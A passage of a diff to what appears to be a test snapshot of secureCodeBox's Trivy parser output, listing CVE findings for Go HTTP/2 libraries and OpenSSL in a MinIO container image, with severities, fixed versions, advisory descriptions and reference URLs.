"https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", - ], - }, - "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8818064ce3c3c0f1b740a5aaba2a987e75bfbafd", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9816136fe31d92ace4037d5da5257f763aeeb4eb", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=c3829dd8825c654652201e16f8a0a0c46ee3f344", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "value": "https://github.com/advisories/GHSA-r7jw-wp68-3xch", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "value": "https://linux.oracle.com/cve/CVE-2023-0215.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0215", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0009.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "value": "https://security.netapp.com/advisory/ntap-20230427-0009/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:7129", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0215", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-69cg-p879-7622", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u4", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0286", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2165", + "https://access.redhat.com/security/cve/CVE-2023-0286", + "https://access.redhat.com/security/cve/cve-2023-0286", + "https://bugzilla.redhat.com/1960321", + "https://bugzilla.redhat.com/2164440", + "https://bugzilla.redhat.com/2164487", + "https://bugzilla.redhat.com/2164492", + "https://bugzilla.redhat.com/2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "https://errata.rockylinux.org/RLSA-2023:0946", + "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "https://linux.oracle.com/cve/CVE-2023-0286.html", + "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "https://ubuntu.com/security/notices/USN-5844-1", + "https://ubuntu.com/security/notices/USN-5845-1", + "https://ubuntu.com/security/notices/USN-5845-2", + "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "https://www.openssl.org/news/secadv/20230207.txt", + ], + }, + "category": "Vulnerability", + "description": "There is a type confusion vulnerability relating to X.400 address processing inside an X.509 GeneralName. X.400 addresses were parsed as an ASN1_STRING but the public structure definition for GENERAL_NAME incorrectly specified the type of the x400Address field as ASN1_TYPE. This field is subsequently interpreted by the OpenSSL function GENERAL_NAME_cmp as an ASN1_TYPE rather than an ASN1_STRING. When CRL checking is enabled (i.e. the application sets the X509_V_FLAG_CRL_CHECK flag), this vulnerability may allow an attacker to pass arbitrary pointers to a memcmp call, enabling them to read memory contents or enact a denial of service. In most cases, the attack requires the attacker to provide both the certificate chain and CRL, neither of which need to have a valid signature. If the attacker only controls one of these inputs, the other input must already contain an X.400 address as a CRL distribution point, which is uncommon. As such, this vulnerability is most likely to only affect applications which have implemented their own functionality for retrieving CRLs over a network.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "X.400 address type confusion in X.509 GeneralName", + "references": [ { "type": "URL", - "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "value": "https://avd.aquasec.com/nvd/cve-2023-0286", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "value": "https://access.redhat.com/errata/RHSA-2023:2165", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/54658", + "value": "https://access.redhat.com/security/cve/CVE-2023-0286", }, { "type": "URL", - "value": "https://go.dev/cl/428735", + "value": "https://access.redhat.com/security/cve/cve-2023-0286", }, { "type": "URL", - "value": "https://go.dev/issue/54658", + "value": "https://bugzilla.redhat.com/1960321", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://bugzilla.redhat.com/2164440", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "value": "https://bugzilla.redhat.com/2164487", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "value": "https://bugzilla.redhat.com/2164492", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", + "value": "https://bugzilla.redhat.com/2164494", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144000", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144003", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144006", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144008", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0969", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144010", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-26", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.1.1-0.20221104162952-702349b0e862", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41721", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41721", - "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", - "https://go.dev/cl/447396", - "https://go.dev/issue/56352", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", - "https://pkg.go.dev/vuln/GO-2023-1495", - "https://www.cve.org/CVERecord?id=CVE-2022-41721", - ], - }, - "category": "Vulnerability", - "description": "A request smuggling attack is possible when using MaxBytesHandler. When using MaxBytesHandler, the body of an HTTP request is not fully consumed. When the server attempts to read HTTP2 frames from the connection, it will instead be reading the body of the HTTP request, which could be attacker-manipulated to represent arbitrary HTTP2 requests.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "request smuggling", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41721", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41721", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-fxg5-wq6x-vr4w", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", }, { "type": "URL", - "value": "https://go.dev/cl/447396", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", }, { "type": "URL", - "value": "https://go.dev/issue/56352", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41721", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1495", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41721", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.7.0", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41723", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/security/cve/CVE-2022-41723", - "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", - "https://go.dev/cl/468135", - "https://go.dev/cl/468295", - "https://go.dev/issue/57855", - "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", - "https://pkg.go.dev/vuln/GO-2023-1571", - "https://vuln.go.dev/ID/GO-2023-1571.json", - "https://www.cve.org/CVERecord?id=CVE-2022-41723", - ], - }, - "category": "Vulnerability", - "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "avoid quadratic complexity in HPACK decoding", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41723", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41723", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", }, { "type": "URL", - "value": "https://go.dev/cl/468135", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", }, { "type": "URL", - "value": "https://go.dev/cl/468295", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", }, { "type": "URL", - "value": "https://go.dev/issue/57855", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "value": "https://errata.rockylinux.org/RLSA-2023:0946", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2023-1571", + "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", }, { "type": "URL", - "value": "https://vuln.go.dev/ID/GO-2023-1571.json", + "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": "0.4.0", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-41717", - "installedVersion": "v0.0.0-20220722155237-a158d28d115b", - "packageName": "golang.org/x/net", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:2367", - "https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", - ], - }, - "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://ubuntu.com/security/notices/USN-5844-1", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://ubuntu.com/security/notices/USN-5845-1", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://ubuntu.com/security/notices/USN-5845-2", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://www.openssl.org/news/secadv/20230207.txt", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-0464", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-0464", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "https://linux.oracle.com/cve/CVE-2023-0464.html", + "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + "https://ubuntu.com/security/notices/USN-6039-1", + "https://www.cve.org/CVERecord?id=CVE-2023-0464", + "https://www.debian.org/security/2023/dsa-5417", + "https://www.openssl.org/news/secadv/20230322.txt", + ], + }, + "category": "Vulnerability", + "description": +"A security vulnerability has been identified in all supported versions + +of OpenSSL related to the verification of X.509 certificate chains +that include policy constraints. Attackers may be able to exploit this +vulnerability by creating a malicious certificate chain that triggers +exponential use of computational resources, leading to a denial-of-service +(DoS) attack on affected systems. + +Policy processing is disabled by default but can be enabled by passing +the \`-policy' argument to the command line utilities or by calling the +\`X509_VERIFY_PARAM_set1_policies()' function." +, + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", + "references": [ { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://avd.aquasec.com/nvd/cve-2023-0464", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://access.redhat.com/security/cve/CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", + }, + { + "type": "URL", + "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + }, + { + "type": "URL", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6039-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-0464", + }, + { + "type": "URL", + "value": "https://www.debian.org/security/2023/dsa-5417", + }, + { + "type": "URL", + "value": "https://www.openssl.org/news/secadv/20230322.txt", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'opt/bitnami/minio/bin/minio' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.7", - "packageName": "golang.org/x/text", + "fixedVersion": "1.1.1n-0+deb11u5", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-2650", + "installedVersion": "1.1.1n-0+deb11u3", + "packageName": "openssl", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - 